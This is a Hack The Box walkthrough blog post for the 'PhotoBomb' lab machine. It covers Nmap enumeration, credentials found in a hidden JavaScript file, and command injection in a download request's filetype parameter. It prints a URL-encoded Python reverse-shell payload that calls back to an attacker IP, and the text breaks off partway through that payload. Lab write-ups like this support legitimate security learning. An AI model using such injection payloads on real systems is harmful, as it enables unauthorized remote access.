PhotoBomb Hack the box Walkthrough — [HTB]

PhotoBomb Hack the box writeup

Published in

InfoSec Write-ups

4 min readFeb 2, 2023

PhotoBomb Hack the box Walkthrough evilox — Source: Hack the box

Hey, Guys welcome to my blog Today we going to discuss about photoBomb hack the box machine which comes up with a Command injection vulnerability to get the user shell and abuses the sudo binary to get the root shell.

Enumeration:

First as usual we start up with the Nmap scan

STEP 1: nmap -sC -sV 10.10.11.182

Usual ports and services are opened

So let's visit the web page http://10.10.11.182

So first add the photobomb.htb to /etc/hosts file

Now you can able to access that page

First I checked the login page with the default username and password but it did not work

So after analyzing this webpage I found the one hidden javascript file in the inspect or dev tools

So let's open this photobomb.js file

Further analyzing this I have found the username and password for the /printer directory

Next open that URL in a new tab and you get will get login access to the printer

Next, click the Download button and capture that request

In the filetype parameter, we going to try the command injection to get the reverse shell

Here I tried the bash payload but It’s won’t work so I going to try the python

%3bexport+RHOST%3d"10.10.16.xx"%3bexport+RPORT%3d5050%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.sp